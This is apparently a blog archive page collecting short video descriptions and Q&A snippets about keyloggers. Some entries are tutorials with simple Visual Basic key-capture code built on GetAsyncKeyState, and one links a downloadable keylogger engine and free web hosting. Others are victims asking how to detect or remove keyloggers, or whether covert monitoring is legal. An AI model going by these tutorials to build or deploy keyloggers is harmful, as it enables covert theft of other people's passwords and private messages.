Archive for the 'key logger' Category

Windows Keylogger VB6

This is a short video about my keylogger, which I made in VB6 …
You can download the file with project(source)here: (beneath)
This program is for educational purposes only !! Please be aware , I’m not responsible for anything that happens wrong…
P.s.: This program is not a virus !
edit: I deleted the link above since a lot [...]

Can i file a police report and press charges on someone who puts a key logger on my PC?

I found out today that my brother installed a key logger on my computer, this sure pissed me off. Is it against the law? and what should i do?
do you live in the same house ? do you both use the same computer ? NO YOU CAN’T SUE ./ OR TOURCHER [...]

is it legal for an employer to covertly monitor internet usage by means of a key logger?

Is it legal if an employer monitors internet usage using a key logger? Especially if they aren’t telling the employee’s they are doing it….?
It depends on where you are. Some states have passed laws requiring notice before an employer may electronically monitor employees. There is no federal law that covers the issue.

How To Make A Key Logger

how to make one with visual basic
Code-
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Timer1-
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End If
Next i
Clear all-
Text1.Text = “”
Duration : 0:3:33

Is there an easy way to find and get rid of a key logger?!?

I know that someone put a key logger on my laptop, the problem is that I have no idea how to find it or remove it…So as you can guess, I have absolutely no privacy! I need help!!!
The free version of superantispyware
http://superantispyware.com is a good software for finding and deleting key loggers

How to make a keylogger part 1

Please visit http://www.hackingfever.com for more cool videos.
What you will need:
-The keylogger engine (this is the zip file!)
http://www.savefile.com/files/1572009
-Filezilla
http://www.filezilla-project.org
-The free website (you don’t have to change anything)
http://www.topcities.com
Disclaimer: I am not responsible for any damage you may cause to your computer or the law, you may only use this on your own computer.
Duration : 0:7:4

How can I tell if there is a key logger on my Mac?

I think some lamer I know who cannot get laid put a key logger on my Mac cos he’s nosey. How can I detect it to be 100% sure, I’ve tried some programs like Macscan, which other FREE programs are there for a Mac to detect?
Thanks
Unless someone has written one for OS X and you [...]

How to know if your laptop has a key logger?

My parents have a history of not knowing how to gradually give there children privacy and at my age i really do need a tiny bit.
how would i be able to tell if someone has put a key logger on my laptop?
would there be a file name or something?
This software scans your PC to see [...]

Visual Basic 2008 Tutorial – KeyLogger

Visual Basic 2008 Tutorial – KeyLogger by o0ogam3ro0o
———–
code
———–
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
For i = 1 To 255
result = 0
[...]

How can I remove a key logger from my computer?

Ok so this kid in school was giving free games to everyone and it turns out that they all had key loggers on them. Kinda creepy… anyway I would appreciate some help with this problem so this kid doesn’t go on all of our facebook profiles.
AVG Anti Virus. Go to download.com and get it for [...]